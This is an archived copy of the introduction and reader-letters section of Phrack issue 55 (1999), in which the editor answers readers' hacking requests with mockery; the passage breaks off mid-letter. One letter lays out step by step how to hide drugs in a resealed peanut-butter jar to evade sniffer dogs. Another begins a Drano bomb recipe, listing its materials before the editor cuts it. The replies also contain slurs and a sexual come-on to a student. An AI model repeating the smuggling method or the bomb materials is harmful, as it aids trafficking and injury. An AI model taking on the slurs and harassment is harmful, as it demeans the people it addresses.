💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › PHRACK › PHRACK55 captured on 2022-06-12 at 13:56:43.
View Raw
More Information
-=-=-=-=-=-=-
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 01 of 19 ]
-------------------------[ P H R A C K 5 5 I N D E X ]
--------[ Return of the Genius Loci ]
Lies! Lies! Lies! Lord of the Lies. That's me. I promised a timely Phrack
and look what happened. A 9 month lapse. Whew. Wow. Ri-friggin-diculous.
Holy crap I suck. To all you patient/ambivalent readers out there -- terribly
sorry about that. To all you whiners/complainers in the end, it just goes to
show you: Fuck Off. For all you people that contributed nothing except
negative commentary over the past few months, I'd like to introduce you to
the real world. The real world is where free computer security technical
journals don't pay bills or get you chicks. Or get you chicks that pay bills
for that matter.
THAT'S THE WORLD I LIVE IN.
TRUST ME WHEN I TELL YOU I WOULD CHANGE IT IF I COULD.
But I can't. So I do what I do to make ends meet. Sometimes it gets in the
way.
Hrm. You think 9 months is bad? Let's take a look at the publishing history
of Phrack Magazine, since its inception, way back in November of 1985. I
present to you the publishing schedule of Phrack Magazine from 1985 - 1999.
______________________________________________________________________________
Jan | 02? 10 23 52
Feb | 03 11 24
Mar | 04 12 25 37 42 45
Apr | 05 13 17 26 38 47 50
May | 31
Jun | 06 18 27 39
Jul | 14 19 43 53
Aug | 15 40
Sep | 07 33 46 48 51 55
Oct | 08? 16? 20 28 34
Nov | 01 21 29 32 35 44 49
Dec | 09? 22 30 36 41 54
------------------------------------------------------------------------------
| 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99
------------------------------------------------------------------------------
Ok.. Things look pretty good for the first year... 8 issues in one year.
Not bad fellas, not bad... Uh-oh! A 6 month gap between 16 and 17! What's
up? Apparently, the editors at that time (Phrack's founding fathers TK and
KL) had gone off to college and left the Magazine in the hands Elric of
Imrryr. Mmmhmm. A FLIMSY EXCUSE! The next large gap we see is between 32
and 33. Apparently there was some crap going on having to do with the Secret
Service shutting Phrack down and something about issues 31 and 32 not being
sanctioned or something... Blah blah blah. Ok great. This was like 8 years
ago. Who the hell carez. At any rate, things appear to be pretty much
business as usual after that. Then something amazing -- Chris Goggans takes
over. First a 3 month gap. Then a 4 month lapse. Then back down to 3. Then
up to 5. Then 6. Then the unthinkable happens. A 16 month coma.
THEN YOURS TRULY TAKEZ OVER AT THE HELM AND BREATHEZ SOME LIFE INTO THIS DEAD
BODY!
BOOM BAP! Check out THESE NUMBERS: 2 months, 4 months, 4 months, 3 months, 5
months!... Um. 9 months. Ok. Well. Oops. My point is... Well. 9 months
isn't as bad as Goggans. So there you have it! Basically, when all's said
and done, at the end of the day, I am not as bad as Goggans.
In any event, this issue has a surplus of good articles. Read them.
In other news, we heard a nasty rumor. Starting September 11th, 1999 Network
Solutions "the dot com people" (*how adorable*) are going to start their
policy of requiring prepayment at the time of domain-name registration. What
does this mean to you? NO MORE FREE DOMAINS FOR THREE MONTHS! No more `try
before you buy`, no more `cooling-off` period. If you fuck up and register
`masster-ninja.com` brother, you're stuck with it! So check your spelling.
Oh yah. I have something very un-P.C. to say, something very controversial...
Something you're not going to like.. But I have to say it:
GOD BLESS CANADA!
WAIT. HOLD ON. Before you rm this issue, give me a chance to explain why
Canada rules. If it wasn't for Canada, there would be no t00nces. There.
That's the sole reason why Canada rules. If it wasn't for t00nces, there
would have probably been a murder at the last Phrack sponsored BBQ (or at
the very least, some serious battery). On 3 separate occasions he quelled
major rucki. The largest of which would have resulted in drunken dirtbag
being pummeled into chowder. He would have been a little smudgie on my
front lawn. As much as I am usually down for a drunken dirtbag pummeling,
we can't have that at the house. t00nces is an all-around great guy. He's
definitely my favorite Canadian-American citizen.
Besides. I lost our Country's pride when I played him in our monthly America
vs. Canada pool game. My penance was to write a treatise on how much Canada
rules. Well. The best I can do is how much t00nces rules.
Phrack Magazine mourns the recent passing of W. Richard Stevens. For a special
tribute, please see P55-04.
Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Phrack World News --------------[ disorder
-------- Elite --------------------> daveg
-- Official Phrack King Crab ------[ loadammo
-- Official Phrack Girlfriend ----[ A.R.A.
-- B.A. Baracus Phrack Fracas -----[ PETE F. vs. KRIS C.
-- Official Phrack Long Gun -------[ Bennelli M1 Super 90 (tactical)
-- WHOA HO HO ---------------------[ aaronb
-- Netris Championz ---------------[ prym & ReDragon
-- Ketel One Connoisseur ----------[ vision
-- Official Phrack Bouncer --------[ t00nces
-- Congratulations to -------------[ W.O.F. and N.R.A.
-- Special Thankz to --------------[ kweiheri, kamee
-- Shout Outs and Thank Yous ------[ h4g1z, felix, WAYNE, rfp, nocarrier, dug
-----------------------------------| song, incr, dreck, nicnoc, e5, sw_r,
-----------------------------------| greg hoglund and dark spyrit, sangfroid,
-----------------------------------| dnm
- You're not in the club if -------[ you don't recognize half of these people
Phrack Magazine V. 9, #55, September 09, 1999. ISSN 1068-1035
Contents Copyright (c) 1999 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editor in chief. Phrack Magazine is made available to the public, as often as
possible, free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------
Editor in Chief: route@phrack.com
Submissions: route@phrack.com
Associate Editor: alhambra@phrack.com
Commentary: loopback@phrack.com
Phrack World News: disorder@phrack.com
Submissions to the above email address may be encrypted with the following key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
mQGiBDdmijIRBADrabrDFYw6PRDrRRZsgetOOGo8oGROn4/H7q4L7rLm7weszn4L
8j1zY4AV4f3jFis0A/AqXPicxUHz0I3L6PzTMg11mmLbcj6wnAvr78LZ65y3Z5aA
PEm/F7fNqAzFl9MCnUWa+53eH0TBKW7JdjpfCELeXTMLNsJREjL7f5qvyQCg/xqD
g7dUtdIiDb7tm5DRhWqgDmED/iPUmujMt5x40bmf135vjev1Rle3nhHIe4fh58a7
VkZOmzqz/s3LninBuWcmuyZWShVGd8Hhd758yt41Xe/YHtEW4jSzYtE/1woYmp0K
sZnFt+zIVAEm1mcVVV9+qrpEKVmbBLTR/oa+6A+t5/hFUjriTpAQUGF0xLzXNLYu
c7cSA/0Q0rziq5xyuPbtUMKWE9zhxrt/SwfhunWx/n2vm2q9eFPfWqb9fDVuFrtv
gwpaPVJ2CbM6F6c21pNGqm8zrSO8TYzgTScBKM80wn7ase3RBth36++N/Oq4Zczm
froc9Och7qkgdZ7TkPCuorsyMc1169DXBxBSGfiQ85ylUYrbrLQRTWlrZSBELiBT
Y2hpZmZtYW6JAEsEEBECAAsFAjdmijIECwMBAgAKCRAWHraAlbJmQSdiAKCjaUrs
InxTXebFlAX5aUmdEKsD1wCfRZMfzv3BvQMKa6Rmbwlfzat0DFS5Ag0EN2aKMxAI
APZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mU
rfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VH
MGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2
azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMh
LLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+c
fL2JSyIZJrqrol7DVekyCzsAAgIH/jCj4drT8VSrxI2N3MlgkiQOMcaGLE8L3qbZ
jyiVolqIeH+NEwyWzCMRVsFTHWfQroPrF30UsezIXuF0GPVZvlzSSB/fA1ND0CBz
9uK9oSYPwI8i513nMaF03bLWlB07dBqiDUcKgfm/eyPGu5SP+3QhVaERDnBOdolZ
J6t3ER8GRgjNUyxXOMaZ4SWdB7IaZVph1/PyEgLLA3DxfYjsPp5/WRJcSbK3NZDG
cNlmozX5WUM7cHwEHzmYSRDujs/e3aJLZPa7stS9YGYVPZcjxQoE6wr+jx4Vjps4
pW+f6iWvWEfYnYRJqzwe8318rX6OojqHttaQs8xNEqvPOTfkt12JAD8DBRg3Zooz
Fh62gJWyZkERAj61AJ41XyTBasgKKYlOVnI4mWZYJemQIQCgiqaTkhpM6xCnqKD9
BKnOvDsNc44=
=IQ3Y
-----END PGP PUBLIC KEY BLOCK-----
As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out
plaintext. You certainly can subscribe in plaintext.
phrack:~# head -20 /usr/include/std-disclaimer.h
/*
* All information in Phrack Magazine is, to the best of the ability of the
* editors and contributors, truthful and accurate. When possible, all facts
* are checked, all code is compiled. However, we are not omniscient (hell,
* we don't even get paid). It is entirely possible something contained
* within this publication is incorrect in some way. If this is the case,
* please drop us some email so that we can correct it in a future issue.
*
*
* Also, keep in mind that Phrack Magazine accepts no responsibility for the
* entirely stupid (or illegal) things people may do with the information
* contained herein. Phrack is a compendium of knowledge, wisdom, wit, and
* sass. We neither advocate, condone nor participate in any sort of illicit
* behavior. But we will sit back and watch.
*
*
* Lastly, it bears mentioning that the opinions that may be expressed in the
* articles of Phrack Magazine are intellectual property of their authors.
* These opinions do not necessarily represent those of the Phrack Staff.
*/
-------------------------[ T A B L E O F C O N T E N T S ]
01 Introduction Phrack Staff 014 K
02 Phrack Loopback Phrack Staff 051 K
03 Phrack Line Noise various 037 K
04 Phrack Tribute to W. Richard Stevens Phrack Staff 004 K
05 A Real NT Rootkit Greg Hoglund 066 K
06 The Libnet Reference Manual route 181 K
07 PERL CGI Problems rfp 017 K
08 Frame Pointer Overwriting klog 020 K
09 Distributed Information Gathering hybrid 010 K
10 Building Bastion Routers with IOS Brett / Variable K 037 K
11 Stego Hasho Conehead 037 K
12 Building Into The Linux Network Layer kossak / lifeline 044 K
13 The Black Book of AFS nicnoc 011 K
14 A Global Positioning System Primer e5 015 K
15 Win32 Buffer Overflows... dark spyrit 078 K
16 Distributed Metastasis... Andrew J. Stewart 031 K
17 H.323 Firewall Security Issues Dan Moniz 015 K
18 Phrack World News disorder 021 K
19 Phrack Magazine Extraction Utility Phrack Staff 021 K
711 K
-----------------------------------------------------------------------------
"...Yeah, yeah, Phrack is still active you may say. Well let me tell you
something. Phrack is not what it used to be. The people who make Phrack
are not Knight Lightning and Taran King, from those old BBS days. They
are people like you and me, not very different, that took on themselves
a job that it is obvious that is too big for them. Too big? hell, HUGE.
Phrack is not what it used to be anymore. Just try reading, let's say,
Phrack 24, and Phrack 54."
- bjx of "PURSUiT" trying to justify his `old-school` ezine. bjx wrote
a riveting piece on "Installing Slackware" article. Fear and respect
the lower case "i".
"We might get a PURSUiT meeting at DefCon 9 which will take place in year
2001. Meenwhile, it's an idea, because I belive 40% of the PURSUiT crew
are going to DefCon 9, so we will try to convince the rest of the crew
to join us."
- bjx of "PURSUiT" on his distant defcon plans. Hey, buddy, if you
save a dollar a day for the next two years, you should have enough!
"I assume she did a jiggly +liar search on altavista..."
- gheap, when asked to venture a guess as how a certain person was found
on a random corporate webpage.
"Hrm.. There just arent enough web sites that use the word `jiggly`."
- gheap, after putting some thought into it.
-----------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 02 of 19 ]
-------------------------[ P H R A C K 5 5 L O O P B A C K ]
--------[ Phrack Staff ]
Phrack Loopback is your chance to write to the Phrack staff with your
comments, questions, or whatever. The responses are generally written by
the editor, except where noted. The actual letters are perhaps edited
for format, but generally not for grammar and/or spelling. We try not to
correct the vernacular, as it often adds a colorful perspective to the
letter in question.
Thanks to kamee and loadammo for their help.
0x01>-------------------------------------------------------------------------
route, you suck--all you phrack people do.
[ Extra double dumb-ass on us! ]
you would think 8 months is enough time to put out phrack 55, but NO.
[ You *would* think so, wouldn't you? I *knew* I should have quit my
job. Well, I'm certain you spent the downtime working on your
world-renown top-notch freely distributed highly-technical ezine
right? How many issues did you pump out? 2? 3? Where can we get
it? ]
You say it will be out on August 31, now it is September 9?
[ 09.09.99 is so much more of an elite date than 08.31.99. In fact,
09.09.99 is the most elite date of our lifetime. ]
Faggots.
[ Is uh.. Is that a proposition? Are you looking for some action or
something? ]
- grez@vulgar.net
[ Thanks man! Now everyone knows where to send the love! ]
0x02>-------------------------------------------------------------------------
I'm a San Francisco criminal defense attorney, and, because I believe curiosity
should not be a crime and information wants to be free, I hereby volunteer my
legal services to Phrack readers. For a free legal consultation, contact me,
Omar Figueroa, Esq. at omar@alumni.stanford.org or (415) 986-5591.
http://www.2xtreme.net/omar/
[ Very cool. I'm sure many readers if nothing else will at least have
questions regarding the law and how it impacts their rarified
profession... Keep in mind Omar that many 'hacker'-types requiring
legal services are prone to idiocy and therefore not likely to have
money. Hope you're up for some good ole-fashioned pro bono work! ]
0x03>-------------------------------------------------------------------------
Hey, glad to see your site back up, I was beginning to wonder what
happened...
[ Alhambra tripped over the power cord. We didn't notice for a few
months. Our bad. ]
While you were down, an item came up on my Zen calendar that I thought
you might enjoy:
[ The `Zen Calander`? Does it have pictures of Shakyamuni Buddha in
a bikini? ]
"The shell must be cracked apart if what is in it is to come out, for
if you want the kernel you must break the shell. And therefore, if
you want to discover nature's nakedness, you must destroy its symbols,
and the farther you get in, the nearer you come to its essence. When
you come to the One that gathers all things up into itself, there your
soul must stay." -Meister Eckhart
hmmm....
[ Man that's just great. I'm going to go dunk my head in a pot of
boiling water now. Be right back... ]
Anyway, Phrack is a *great* mag, keep up the good work.
[ Agreed. Thanks. ]
- ped xing
0x04>-------------------------------------------------------------------------
I don't have a computer yet because I don't know to much about it??
[ Are you asking me or telling me? And if you're sans computer, how
the hell are you writing me this email? OMG! Are we communicating
through your mind?!?@! Are you using the /shining/? Ok. You can
use yer shining to call me when you need my help... But don't be
reading my mind between 4 and 5. That's _route's_ time. STAY OUT! ]
but the basic things but i been trying to get to some underground site
which willput me in the write direction,into hacking...
[ I'm suggesting you spend that computer money on some at-home ESL
classes. ]
in your site is off the hook,it has infor that i can use thanx
[ Yes, when I'm watching a movie or I don't want to be bothered, I
take www.phrack.com off the hook. ]
I know i may not be answered back but can you send me some site that may
help me into starting my long journey of hacking
[ http://owl.english.purdue.edu/esl/ESL-student.html ]
...thank you...in my email is weeddreams@yahoo.com
0x05>-------------------------------------------------------------------------
Hi,
I am a wannabe hacker.
[ I'm a wannabe rockstar. Wanna hang out? ]
I have access to all the equipment. modems, routers, even my own pbx.
[ Well that's a start! I suggest the next step should be actually
getting a computer of some sort so all that networking hardware
doesn't go to waste! ]
Where will i find material describing typical methods to test the systems
for security. (TCP- SYN attack, ip-spoofing)
[ Phrack Magazine, issues 48 - 53. ]
I am especially interested in DOS attacks.
[ And why not? You seem like a highly intelligent guy. I'll give you
a heads up on a particularly nasty one (as yet unreleased) certain to
take down even the most resilient hosts: Send the following 4 packets to
the target host:
1 - TCP SYN|RST with ISN == (2^32 - 0x12A3) to a LISTENing port
2 - TCP ACK with SEQ_ACK == (0x12A4) to same port
3 - ICMP_PORT_UNREACH (IP header inside is irrelevant)
4 - UDP to same port
Next, quickly douse your computer in lighter fluid, and set it on fire.
Wait a few minutes, then try and reach that host. You'll find that you
can't. Thank me later. ]
Any pointers will be appreciated.
[ void *you = NULL; ]
- LordKrishna
0x06>-------------------------------------------------------------------------
I know quite a bit about computers and started learning to program (or trying
at least - I had trouble figuring out what the hell a variable was) when
I was like seven.
[ Yah, variables are tricky -- don't use them. Stick to symbolic
constants. ]
Now, I'm kinda' interested in hacking and phreaking, but I have seen many
files out there from the 80's and early 90's that probably have little or
no significance know.
[ As useless as 1950's porn. ]
I have seen plans for blue boxes and red boxes everywhere, but I am assuming
that this does not work anymore, since as stupid as phone companies are often
depicted, I'm sure they have managed to fix these problems by now.
[ I have seen plans for world domination everywhere, and not even those
work. Personally, I want my money back. ]
However, I'm sure that there's still lots to do as far as phreaking goes,
and definately hacking, because I hear about that all the time.
[ I don't think anyone's ever hacked a tic-tac before. You could
start there! ]
Anyway, I was wondering if you or someone else you know would care to write a
file describing what works and doesn't in the modern world. I love to read
Phrack, but a lot of the older issues are either over my head
[ Me too! I especially have problems with P25-05, P27-08, P28-06.
I don't understand the need for wild turkeys when hacking. Maybe
it was a fad 10 years ago. ]
or seem more or less irrelevant. As you, and most other hackers/phreaks,
probably grew up when computers were still in earlier stages,
[ Yep. My first computer was a rock and some dirt. ]
you probably know a lot more about how they work than newer programmers.
[ Oh hell yes! Think of a computer as a tiny, super complex street
hooker. The more you put in.. Wait. No. That's not a good
analogy... Um... A computer is like a piece of paper. Er. No.
Um. I really have no idea how they work. ]
I can tell this just by reading this ASM book I got. I had no idea what
kinda' stuff happened with the actual hardware and its fun to learn.
[ Hrm. Do you think maybe we could get together one night and
you could read to me? Softly? ]
Basically, I just want a modern beginner's guide so I can go out and get my
feet wet.
[ Well jump right in! The idiot pool has plenty of space and I'm
told the new spa has a diving board. ]
Most of the literature I have seen on phreaking/basic hacking is really old,
so if you know of anything modern I could look at, or would like to write
something yourself, I'd appreciate this quite a bit.
[ Have you tried searching for "hack +modern" on altavista? ]
Thanks a lot, man.
- Cyber Guy
[ Great handle man! ]
0x07>-------------------------------------------------------------------------
hia chief
[ Heya dorko. ]
my nick is spider
[ How creative. Chalk has more flavor. ]
i'm a future hacker to be for now i need info about a free server
[ That's nice. I need info on how to make girls like me. I think we
can probably help each other. ]
- spider.
[ Great handle man! ]
0x08>-------------------------------------------------------------------------
phreaks, i have recently discovered your site.
[ Congratulations. I've recently discovered how to love. ]
i must say i was impressed by the contents.
[ Well thank you very much! Sounds good so far... ]
i live in japan, the drug trade here is good but very expensive.
[ Hrm. Have you tried switching to generics? I know acetylsalicylic
acid is sold in many generic forms. ]
so i import cid and x from the states...one problem....they have a police
[ Japan has to import Caller ID? ]
dog to sniff every item before it is mailed. i have found a way to by pass
this. first get a new unopened peanut butter jar....take the seal off very
[ Hrm. Skippy or Jiff? Glass Jar or Plastic? Crunchy or smooth?
And how big? What about peanut butter cookies? Will they work?
Please people... Before you send in some half-cocked scheme, take
2 minutes and do some research. ]
carefully dont rip it....scoop out a good amout of pb from the center..
carfully place "the stuff" inside a plastic bag and place into the jar...
recover with the pb.....
[ What do I do with the extra peanut butter? Can I use it to make a
samich? Or should I hold on to it for safe keeping? ]
place the seal back ontop and iron on....this gives back its unopened
look...next place lid back on top and your ready to be inspected.
- Sloshkin
[ Well nice going Sloshkin! You've managed to ruined this completely
lame drug trafficking technique for moronic drug smugglers! All FBI
agents please contact your DEA pals! Tell them to be on the lookout
for peanut butter. ]
0x09>-------------------------------------------------------------------------
Due to the slow net,I have diffculty to download your excellent articles.
[ Yep. It's all the porn trafficking going on. ]
Can you do me the favor to send it to me by email?
[ Not a problem, expect them in 6 - 8 weeks. ]
I will not do harm to anyone,I swear.
[ Better not. Phrack is equipped with explosive dye packs. If you
do something illicit they will explode all over your hands and face
and the authorities will be alerted. ]
0x0a>-------------------------------------------------------------------------
I sing and play guitair in a fairly unique punk band called "The gods
Hate Kansas".
[ Really? That's coincidental because I hate Kansas. ]
Our lyrics and beleifs tend to revolve around corporate and governmental
sabotage.
[ Excellent idea. Let's collapse our economy and destroy the
government. Better yet, let's beat terrorist extremists (like
Osama Bin Ladin) to the punch and blow ourselves up. Do you have
any idea how much they hate Americans? Oh wait, they're just
`Wag The Dog` inventions, right? ]
Right now, we're gearing up to record in June. The new CD will only be
about 5 songs so we decided to make it a "multi-media" CD and include a
couple videos, our website, and some misc. files on lockping, redboxing,
and hacking.
[ Those free AOL CDs sound better. Must miss! ]
I was wondering if you might have anything that you might specificly want
to contribute to this effort.
[ Just my unending sarcasm. Oh, BTW I was being sarcastic. ]
The punk scene is a wonderfull breeding ground of discontent and has a lot
of paralels to hacker culture
[ Hackers are discontent? Hrm. Larry Wall seems pretty happy. And I
don't think he likes punk. ]
and this CD has the potential to reach a lot of people..
[ Like all the 15 year old disgruntled suburban kids in Kansas who think
they `have it rough at home` and `no one understands their shit` so
they get their noses pierced along with lame haircuts and hang out
at seedy hardcore clubs! ]
- Rion
0x0b>-------------------------------------------------------------------------
WUZ ^
[ How preciously retarded! ]
I found my schools dial-up and I want you guys to try and hack it if you can.
ITS: xxx-7035 St. Francis Jr. High. Fuck it up as much as possible please!
[ Dude, somehow I don't think it would right for us to hack into a
`special` education school. I think you should just get back to your
room, back into your restraints, and back on the meds. ]
They have an entire network of macs and ibm's.
[ All hooked up to machines to keep you guys from drooling. ]
0x0c>-------------------------------------------------------------------------
Sup, I am interested in hacking. I do not know much about how to hack and
want to learn more. I want to try and get a password from a certain somebody to
read their mail.
[ Well, genius, TRY ASKING. ]
I opened up an account at wowmail to check it out. I found out that once
you are in your own account that if u view source...it actually shows you
your password!
[ NO WAY@!#! HOLY SHIT THAT'S INCREDIBLE! ]
So...is there a way to write a program where when a user tries to open
their mail...somehow u can view source and send it back to your e-mail
account without the user ever finding out?
[ Jesus, let her go man and mind that restraining order. ]
Or is there another way u could tell me how I could obtain the password
and how to go about it?
[ Spy for love. Pattern yourself after the Stasi Super-Romeo Roland G.
He won the affections of a lovely young woman named Margarete, an
interpreter at NATO's SHAPE (Supreme Headquarters Allied Powers Europe).
She divulged all kinds of secrets regarding Allied military manuvers
and whatnot. ]
Thanx,
Steve
0x0d>-------------------------------------------------------------------------
Just wondering if i can be a part of Phrack.com ?
[ Short answer: No. Long answer: Hell no. ]
Personal Information
~~~~~~~~~~~~~~~~~~~~
Handle: Action Man
Call me: Steve
Past Handle: Virtual Son, Renegade
[ Oooh! Lorenzo Lamas reads Phrack! I am torn between killing myself with
a shovel or with the garbage disposal. ]
Handle Origin: You know when some phat name that pops into your head
when you need a handle....well there you go./ "Action Man"
from the movie "MasterMinds"
[ Master? Man head? Action? "Handle"? That's just too many homo-erotic
masturbation-related words to be a conincidence. Less jerking, more
schoolin' I say. ]
Height: 5'8"
Weight: 175lbs
[ Whoa. A bit heavy aren't we? You know it's never *too* early to NOT
eat bear claws 2 at a time. ]
Eyes: Brown
Hair: Brown
Computers: IBM/Pentium TE(Technology Edge)
When i was in the 5-6th grade i had an interest in computers and how they
worked.
[ Hey great. Let try and find a homeless person that cares. ]
So my first comp was a ibm aptiva.
[ My first comp was a room upgrade in Vegas. ]
Not very fast but enough to get me through the day.
[ Man, it usually takes me 3 or 4 ketel-1/tonics to get through the day. ]
I started to have the interest in hacking/phreaking when i was about in
the 7th so that the computer stuff came easy to me..
[ c:\dos> vol
Volume in drive C is DOS
Volume Serial Number is 12A1-1C20
c:\dos> label
Volume in drive C is DOS
Volume Serial Number is 12A1-1C20
Volume label (11 characters, ENTER for none)? 3L1T3H4CK3R
c:\dos> vol
Volume in drive C is 3L1T3H4CK3R
Volume Serial Number is 12A1-1C20
c:\dos> damn i rool
Bad command or file name
Keep the faith buddy... ]
at this point in time i am still crawling through the maze of hacking..
[ Me too! Well, kinda. I'm at the bottom of a vodka bottle. Same
difference though. ]
reading books...looking through the articles at your site and spending
endless nights on the comp throwing commands at computers i get in to and
dont know what i am in for.
[ c:\dos> root
Bad command or file name
c:\dos> give actionman root
Bad command or file name
c:\dos> password root actionman
Bad command or file name
c:\dos> FUCKFUCKFUCKFUCKFUCKFUCKFUCK
Bad command or file name
c:\dos> whyamisolameohgodpleasesomeonekillme
Bad command or file name
c:\dos> ohgodimafourstarloser
Bad command or file name ]
So far in my boring ass town from where i dwell.
[ Huh? ]
Noone around here does what us Elite personnel do and it bothers me.
[ By `us` I am going to assume you mean anyone but myself and Phrack staff.
Actually, I am going to demand it. ]
It bothers me that i cant hang with someone.
[ Maybe you should try to make some friends Action Man! Your life can't
be all hacking and saving the world and riding around on a Harley! ]
I have to do it the hard way and that way is alone.
[ Get use to it. ]
Hopefully you can recrute me into the world of Phrack.com
[ I think it's time for an intervention. Get yourself a sponsor. ]
Thank you
- Action Man
0x0e>-------------------------------------------------------------------------
I Started my search today for revenge.
[ Did you look under the bed? Whenever I'm trying to find something,
like the T.V. remote, it's usually under the bed. ]
My goal to learn to hack or talk a bored halker into helping me hack my
ex's computer.
[ Check out action man, I hear he's pretty damned good. ]
After reviewing sites that you have made of 'how to hack' I see that what
you do isn't as easy as one might first mistaken.
[ It takes many many many hours to get this good. I'm talking dozens. ]
As far as my goal I now see it wouldn't do any good or accomplish shit. So
thanx for making all this info available to a peon such as myself.
- Z-taj
[ Wow, that was easy. I wish everyone gave up that quickly. ]
0x0f>-------------------------------------------------------------------------
How to make a Drano Bomb
by the Fellow Felon
WARNING!!!!!!: This Article is Intended for Educational Use Only!!
[ WHICH IS IRONIC GIVEN ITS SOURCE! ]
The Unabomber Staff is NOT responsible for any misuse of this information!!
[ Cretin. How do you misuse bomb creation plans? Isn't the intention
to blow something up? ]
Setting these off within city limits is a crime and you Probably will get
caught.
[ Not to mention the idiocy factor. ]
Enough of that.
A Drano Bomb is a simple way to scare the hell out of anyone.
It sounds like a Shotgun Blast.
[ How about a real shotgun? When fired, it sounds more like a shotgun
blast and will scare more people. ]
First however, you must obtain some aluminum foil,
[ Foil, as we all know, can be tricky to track down. I've found that it
usually runs in herds, and on a hot day foil herds tend to gather near
lakes or rivers. One well placed head shot will bring your foil down.
Course, then you gotta clean it... If you can't obtain this foil,
do the next best thing and use your mom's best china. ]
"The Works"-a toilet bowl cleaner, and a 20 ounce Pop bottle. You can
use any toilet bowl cleaner as long as it says somewhere on ther bottle,
"WARNING!!-CONTAINS HYDROCHLORIC ACID!!".
[ Ok. Enough of this crap. Had I left this entire letter in, some
retard would probably blow his dick off and somehow, I'd be liable. ]
0x10--------------------------------------------------------------------------
hey, u got some real nice info here.
[ Hey man I've got some real nice *everything* here. Take only pictures,
leave only footprints. ]
i used a few of the ideas for revenge and thanks alot for posting it.
[ People like you make people like me want to own guns. Well, _more_
guns... more ammunition anyway... ]
it really sucks that the punk ass govt. wants to take all this shit off the
net.
[ The `punk ass` government rounds people like you up by the truckload
and sticks them in pens to barter with the aliens who frequent our
planet. "Ok, how many do you want this time to NOT enslave our entire
race...?" Just remember to lift at the knees. ]
u know it all stems from fear that the public will finally rise up and take
control.
[ Or that retards like you will try to build a draino bomb and blow off
his dick. I say go for it. ]
anyway, i'd really appreciate it if u come across anything having to do
with phuckin up cars or things that go "kaboom" let me send them my way.
[ PLEASE DON'T BREED. ]
hey, don't send the files here please. i phucked up on the address.
send it master23@collegeclub.com. thanks. the other site is open to a
few other people. it would be best for me if they didn't see it.
[ DON'T BE A PUPPET TO THE MAN! Stand up for yourself! ]
- master23
[ Hey, any relation to master22? He was in my shop class. ]
0x11>-------------------------------------------------------------------------
Hi there !
I read, that you are good informated in hacking stuff, IP's...
[ I know a thing or two about a thing or two. ]
My question is:
I made a bet with a friend, that I'll hack to his computer.
[ A rousing game of cat and mouse! You rogue! ]
But there fore I need his IP.
[ What do you mean my horse is out of gas? ]
I have already tried much things but all did fail, do you
know a procedure to get his IP, he has got while he is online without
NetBus or IRC ? I thought of finding out his DNS, or are there other ways
to reach my aim ?
CU & olease write back !
- Kerstin
[ Kerstin.. That's a cute name. Hrm.. I bet you're cute. In fact,
I think we might have a lot in common... Although.. Hrm.. Now that I
think about it, your spelling and broken English are just queer enough
that you're probably from a country where Kerstin is a guy's name...
In which case, I'm going to have to ask you to leave. ]
0x12>-------------------------------------------------------------------------
WHAT IS THE REASON OF THE HOW TOO INFO ON THIS SITE.
[ OH MY DEAR GOD, IT'S WALKING CLOSER GUYS! ]
DO KNOW WHAT YOU ARE DOING TO OUR CHILDREN.
[ Don't tell anyone, but I heard it was television and radio. And
the rap music. ]
SOMEONE TOLD ME TODAY THAT THIS THURS. IS BLOW UP YOUR SCHOOL NATIONAL HOLIDAY.
[ I'm willing to bet that you're one of those people who gets dismissed in
shame because that "ability to differentiate fantasy from reality" part
of your brain doesn't work quite right. ]
THEY TOLD ME CHECK THIS SITE OUT.
[ Well then! Even though you're an asshole, apparently your friends
aren't. ]
I CAN NOT BELIEVE WHAT I HAVE READ.
[ You're talking about proof reading your email before sending it, right?
Or maybe your broken caps lock key? ]
I AM SICK AT MY STOMACH!!!!!!!!!!!!!!!!!!!!!!!!
[ Let's say this Twinkie represents the normal amount of psychokinetic
energy in the New York area. According to this morning's PKE sample,
the current level in the city would be a Twinkie 35 feet long weighing
approximately six hundred pounds. That's a big Twinkie. ]
WHAT IS THE PURPOSE PLEASE LET ME KNOW. I CANT FIGURE OUT 1 SINGLE
REASON. JUST SICK...........
[ I think you have the wrong number. What number were you trying to
dial? ]
- Tracy.
0x13>-------------------------------------------------------------------------
Please help me.
I tested neptune program in linux kernel 1.2.8.
Target host's OS is Redhat 5.2.
But!! TCP SYN flooding cannot!!
Unreachable host address was 1.0.0.1
Target port was 23
SYN number was 100 ~ 10000000000.
After runningBut!! Connection established!!
Why??
[ Yoda needs to lay off the DOS attacks. ]
0x14>-------------------------------------------------------------------------
i need help hacking into the university of texas' system. any information at
all would be helpful. i need to change my grades before the report cards
come out. thanks.
- christina
i really need some help changing my grades. i got ot the university of texas
at austin. if i fail i'll get kicked out of ut and my house. any information
would be very very helpful! thanks.
[ Did you just stutter or was that a double-dose of stupidity? ]
- christina
[ Hrm... Well muh dear, let's talk trade. Why don't you come on over
Friday night, at say, 9ish? I'm sure we'll be able to work something
out... And if you DO end up getting kicked out of your house... You
can always stay at the Phrack Compound.. ]
0x15>-------------------------------------------------------------------------
I am looking for a very simple and easy to follow recipe for the synthesis
of amphetamine.... Anytype..... As long as it is relatively easy to
follow..... Many thanx in advance
[ Ah yes. The lame legacy of Phrack past. Drug creation. Whoo. Dude.
Get a fucking job and move out of your parent's basement before you
blow it up with your ghetto drug lab attempt. ]
- Blonk
0x16>-------------------------------------------------------------------------
Hi,
I was wondering if you would be able to place more articles about
